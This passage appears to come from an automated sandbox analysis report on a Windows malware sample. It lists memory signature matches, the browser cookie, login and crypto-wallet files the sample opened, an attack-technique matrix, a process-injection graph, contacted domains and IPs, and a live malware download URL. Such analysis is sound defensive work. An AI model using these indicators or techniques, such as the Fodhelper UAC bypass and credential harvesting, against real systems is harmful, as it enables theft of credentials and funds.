                                Source: Yara matchFile source: 00000011.00000002.2190393639.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1900431911.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.2457876157.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1711348411.00000000024A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000003.2133195697.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.4130064269.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.4130620822.0000000002E11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                Source: Yara matchFile source: 0000000B.00000002.2315527223.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 21.1.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.2.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.1.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.E36B.exe.2d515a0.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.E36B.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.E36B.exe.2dd15a0.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002A.00000002.3052219524.0000000000843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2204215062.0000000003213000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000001.2299335069.0000000000843000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000001.2202228549.0000000000843000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2293956463.0000000000843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.2310762272.0000000003193000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 12.2.B43A.exe.5c0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.B43A.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-HI55A.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M5NA9.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-CV65T.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5RMT.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-M3SQC.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-JNRFN.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-LN8F3.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5KRR.tmp, type: DROPPED
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 11.0.B013.exe.dc0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000B.00000002.2315527223.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000000.2062162666.0000000000DC2000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\B013.exe, type: DROPPED
                                Source: Yara matchFile source: 3.2.wesswwi.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.3.CA06.exe.890000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.3.gwsswwi.25e0000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.3.wesswwi.910000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.ZRgv8wdMtR.exe.2480e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.2.gwsswwi.25d0e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.ZRgv8wdMtR.exe.2490000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.CA06.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.wesswwi.900e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.CA06.exe.880e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.2.gwsswwi.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.ZRgv8wdMtR.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000002.1711385659.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.1951376961.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.2192095995.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1645990983.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000003.2405200857.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.1951330825.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.2458238302.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.2190393639.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1900431911.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.2457876157.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1711348411.00000000024A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000003.2133195697.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.4130064269.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.4130620822.0000000002E11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                                Valid Accounts221
                                Windows Management Instrumentation
                                1
                                DLL Side-Loading
                                1
                                Abuse Elevation Control Mechanism
                                1
                                Disable or Modify Tools
                                1
                                OS Credential Dumping
                                2
                                System Time Discovery
                                1
                                Exploitation of Remote Services
                                11
                                Archive Collected Data
                                1
                                Exfiltration Over Alternative Protocol
                                13
                                Ingress Tool Transfer
                                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
                                Default Accounts13
                                Native API
                                1
                                Registry Run Keys / Startup Folder
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                1
                                Brute Force
                                1
                                Account Discovery
                                Remote Desktop Protocol2
                                Data from Local System
                                Exfiltration Over Bluetooth21
                                Encrypted Channel
                                SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                                Domain Accounts1
                                Exploitation for Client Execution
                                Logon Script (Windows)712
                                Process Injection
                                1
                                Abuse Elevation Control Mechanism
                                1
                                Credentials in Registry
                                3
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Email Collection
                                Automated Exfiltration1
                                Non-Standard Port
                                Data Encrypted for ImpactDNS ServerEmail Addresses
                                Local AccountsCronLogin Hook1
                                Registry Run Keys / Startup Folder
                                4
                                Obfuscated Files or Information
                                NTDS346
                                System Information Discovery
                                Distributed Component Object ModelInput CaptureTraffic Duplication1
                                Multi-hop Proxy
                                Data DestructionVirtual Private ServerEmployee Names
                                Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script23
                                Software Packing
                                LSA Secrets1
                                Query Registry
                                SSHKeyloggingScheduled Transfer4
                                Non-Application Layer Protocol
                                Data Encrypted for ImpactServerGather Victim Network Information
                                Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                Timestomp
                                Cached Domain Credentials1171
                                Security Software Discovery
                                VNCGUI Input CaptureData Transfer Size Limits145
                                Application Layer Protocol
                                Service StopBotnetDomain Properties
                                External Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                DLL Side-Loading
                                DCSync661
                                Virtualization/Sandbox Evasion
                                Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 Channel2
                                Proxy
                                Inhibit System RecoveryWeb ServicesDNS
                                Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                File Deletion
                                Proc Filesystem3
                                Process Discovery
                                Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
                                Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                                Masquerading
                                /etc/passwd and /etc/shadow1
                                Application Window Discovery
                                Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
                                Supply Chain CompromisePowerShellCronCron661
                                Virtualization/Sandbox Evasion
                                Network Sniffing3
                                System Owner/User Discovery
                                Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
                                Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd712
                                Process Injection
                                Input Capture1
                                Remote System Discovery
                                Software Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
                                Compromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                Hidden Files and Directories
                                KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureExfiltration Over Physical MediumDNSResource HijackingDNS ServerGather Victim Org Information
                                Compromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                Regsvr32
                                GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionExfiltration over USBProxyNetwork Denial of ServiceVirtual Private ServerDetermine Physical Locations
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1365407 Sample: ZRgv8wdMtR.exe Startdate: 21/12/2023 Architecture: WINDOWS Score: 100 116 zimbra.justdave.net 2->116 118 useron15.hostmaster.sk 2->118 120 152 other IPs or domains 2->120 146 Snort IDS alert for network traffic 2->146 148 Multi AV Scanner detection for domain / URL 2->148 150 Found malware configuration 2->150 152 20 other signatures 2->152 13 ZRgv8wdMtR.exe 2->13         started        16 wesswwi 2->16         started        18 gwsswwi 2->18         started        signatures3 process4 signatures5 192 Detected unpacking (changes PE section rights) 13->192 194 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->194 196 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 13->196 20 explorer.exe 27 22 13->20 injected 198 Maps a DLL or memory area into another process 16->198 200 Checks if the current machine is a virtual machine (disk enumeration) 16->200 202 Creates a thread in another existing process (thread injection) 16->202 process6 dnsIp7 122 ftpvoyager.cc 2.180.10.7 TCIIR Iran (ISLAMIC Republic Of) 20->122 124 stualialuyastrelia.net 91.215.85.17, 49738, 80 PINDC-ASRU Russian Federation 20->124 126 7 other IPs or domains 20->126 86 C:\Users\user\AppData\Roaming\wesswwi, PE32 20->86 dropped 88 C:\Users\user\AppData\Roaming\gwsswwi, PE32 20->88 dropped 90 C:\Users\user\AppData\Local\Temp36B.exe, PE32 20->90 dropped 92 8 other files (5 malicious) 20->92 dropped 154 System process connects to network (likely due to code injection or exploit) 20->154 156 Benign windows process drops PE files 20->156 158 Injects code into the Windows Explorer (explorer.exe) 20->158 160 3 other signatures 20->160 25 B013.exe 20->25         started        29 FC24.exe 20->29         started        32 8F78.exe 20->32         started        34 9 other processes 20->34 file8 signatures9 process10 dnsIp11 138 38.47.221.193 COGENT-174US United States 25->138 168 Detected unpacking (changes PE section rights) 25->168 170 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 25->170 172 Query firmware table information (likely to detect VMs) 25->172 186 8 other signatures 25->186 106 C:\Users\user\AppData\Local\Temp\...\FC24.tmp, PE32 29->106 dropped 36 FC24.tmp 29->36         started        174 Contains functionality to inject code into remote processes 32->174 176 Drops PE files with benign system names 32->176 178 Injects a PE file into a foreign processes 32->178 38 8F78.exe 3 11 32->38         started        140 neighborhoodfeelsa.fun 172.67.143.130 CLOUDFLARENETUS United States 34->140 142 bombertublestylebanws.fun 104.21.13.14 CLOUDFLARENETUS United States 34->142 144 104.21.18.224 CLOUDFLARENETUS United States 34->144 108 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 34->108 dropped 110 C:\Users\user\AppData\Local\...\tk86t.dll, PE32+ 34->110 dropped 112 C:\Users\user\AppData\Local\...\tcl86t.dll, PE32+ 34->112 dropped 114 12 other files (none is malicious) 34->114 dropped 180 System process connects to network (likely due to code injection or exploit) 34->180 182 Detected unpacking (overwrites its own PE header) 34->182 184 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 34->184 188 6 other signatures 34->188 43 E36B.exe 34->43         started        45 regsvr32.exe 34->45         started        47 conhost.exe 34->47         started        49 3 other processes 34->49 file12 signatures13 process14 dnsIp15 51 FC24.exe 36->51         started        128 mx2.hostcreators.sk 217.61.3.26 XANDMAIL-ASNDE Italy 38->128 130 37.9.169.112 WEBSUPPORT-SRO-SK-ASSK Slovakia (SLOVAK Republic) 38->130 132 135 other IPs or domains 38->132 96 C:\ProgramData\Drivers\csrss.exe, PE32 38->96 dropped 162 Found Tor onion address 38->162 164 May use the Tor software to hide its network traffic 38->164 166 UAC bypass detected (Fodhelper) 43->166 54 cmd.exe 43->54         started        file16 signatures17 process18 file19 84 C:\Users\user\AppData\Local\Temp\...\FC24.tmp, PE32 51->84 dropped 56 FC24.tmp 51->56         started        59 fodhelper.exe 54->59         started        61 conhost.exe 54->61         started        63 fodhelper.exe 54->63         started        65 fodhelper.exe 54->65         started        process20 file21 98 C:\Program Files (x86)\...\splitcontrolvb.exe, PE32 56->98 dropped 100 C:\Program Files (x86)\...\is-N5KRR.tmp, PE32 56->100 dropped 102 C:\Program Files (x86)\...\is-HI55A.tmp, PE32 56->102 dropped 104 99 other files (none is malicious) 56->104 dropped 67 net.exe 56->67         started        69 splitcontrolvb.exe 56->69         started        72 splitcontrolvb.exe 56->72         started        75 E36B.exe 59->75         started        process22 dnsIp23 78 conhost.exe 67->78         started        80 net1.exe 67->80         started        94 C:\ProgramData\PDiskSnap75\PDiskSnap75.exe, PE32 69->94 dropped 134 185.196.8.22 SIMPLECARRER2IT Switzerland 72->134 136 95.216.227.177 HETZNER-ASDE Germany 72->136 190 Injects a PE file into a foreign processes 75->190 82 E36B.exe 75->82         started        file24 signatures25 process26

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                ZRgv8wdMtR.exe44%VirustotalBrowse
                                ZRgv8wdMtR.exe38%ReversingLabsWin32.Trojan.Generic
                                ZRgv8wdMtR.exe100%AviraHEUR/AGEN.1312672
                                ZRgv8wdMtR.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Program Files (x86)\SplitControlVB\bin\x86\7z.exe (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\OptimFROG.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bass.dll (copy)3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bass_aac.dll (copy)3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bass_fx.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bass_ofr.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bass_tta.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bassalac.dll (copy)3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bassape.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\basscd.dll (copy)3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bassdsd.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bassflac.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bassmidi.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bassmix.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\bassopus.dll (copy)3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\basswma.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\basswv.dll (copy)3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\d_writer.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\da.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\daiso.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\dsd2.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\dsd2pcmt.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\dstt.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\ff_helper.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\gain_analysis.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-061H5.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-3KPO5.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-40QD3.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-4ENN3.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-5KQFU.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-5N34J.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-6NO5U.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-7D04O.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-82753.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-8N3DM.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-8RC7G.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-95FJN.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-9EJD1.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-AHKA2.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-ARAOP.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-AUP01.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-B8UB5.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-BN6BT.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-CA7HB.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-CJH5R.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-CV65T.tmp3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-FNH7L.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-GR4AC.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-HI55A.tmp3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-JNRFN.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-LB4R5.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-LN8F3.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-M3SQC.tmp3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-M5NA9.tmp3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-M77GN.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-MSK3G.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5KRR.tmp3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-N5RMT.tmp3%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-NJ5T1.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-NPP07.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-O8J8D.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-OURMN.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-PK59T.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-QG5TG.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-RL3ER.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-SK9ML.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-T6JRC.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-U6T88.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-ULAJR.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\is-V43EJ.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\lame_enc.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\libFLAC_dynamic.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\libdtsdec.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\libmp4v2.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\libsox-3.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\libsoxr.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\libvorbis.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\libwebp.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\libwinpthread-1.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\mp3gain.exe (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\opusenc.exe (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\pcm2dsd.exe (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\plugins\internal\is-139BC.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\plugins\internal\is-HJRAJ.tmp0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)0%ReversingLabs
                                C:\Program Files (x86)\SplitControlVB\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)0%ReversingLabs
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                izberatel.sk0%VirustotalBrowse
                                inhodinky.sk0%VirustotalBrowse
                                tsutomu.com0%VirustotalBrowse
                                cream.hitsturbo.com20%VirustotalBrowse
                                lightseinsteniki.org21%VirustotalBrowse
                                magokorokan.com0%VirustotalBrowse
                                janckulik.sk0%VirustotalBrowse
                                abatek.sk0%VirustotalBrowse
                                s-kotobuki-s.co.jp0%VirustotalBrowse
                                eurokamen.sk0%VirustotalBrowse
                                escolapatelli.com.br0%VirustotalBrowse
                                erikamoveis.com.br0%VirustotalBrowse
                                keramat.sk0%VirustotalBrowse
                                predan.it1%VirustotalBrowse
                                ampub04.alpha-mail.net0%VirustotalBrowse
                                www.predan.it0%VirustotalBrowse
                                gw1.mx.anafra.net0%VirustotalBrowse
                                nakupusa.cz0%VirustotalBrowse
                                www.sport-tour.sk0%VirustotalBrowse
                                mailhost01.rkd.sk0%VirustotalBrowse
                                SourceDetectionScannerLabelLink
                                http://tonimiuyaytre.org/0%URL Reputationsafe
                                https://linkofstrumble.com/fe59b57390b3eb9c78ef311810f298a4/288c47bbc1871b439df19ff4df68f076.exe100%Avira URL Cloudmalware
                                http://eshopy-katalog.sk/administrator/index.php0%Avira URL Cloudsafe
                                http://daxter.fsnet.co.uk/k0%Avira URL Cloudsafe
                                https://outlook.com_0%URL Reputationsafe
                                http://oitacity.jp/pma/0%Avira URL Cloudsafe
                                https://aloeveraforever.sk/phpmyadmin/D0%Avira URL Cloudsafe
                                http://aloeveraforever.sk/r0%Avira URL Cloudsafe
                                http://abatek.sk/PhpMyAdmin/0%Avira URL Cloudsafe
                                http://tsutomu.com/PhpMyAdmin/0%Avira URL Cloudsafe
                                http://aquamat-liptov.sk/phpMyAdmin/0%Avira URL Cloudsafe
                                http://abatek.sk/wp-login.php0%Avira URL Cloudsafe
                                http://brightright.com/wp-login.php0%Avira URL Cloudsafe
                                http://khi-ho.ne.jp/phpMyAdmin/w2G0%Avira URL Cloudsafe
                                https://eurokamen.sk/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8.40%Avira URL Cloudsafe
                                http://ivory.plala.co.jp/0%Avira URL Cloudsafe
                                https://elrocket.com/phpmyadmin/0%Avira URL Cloudsafe
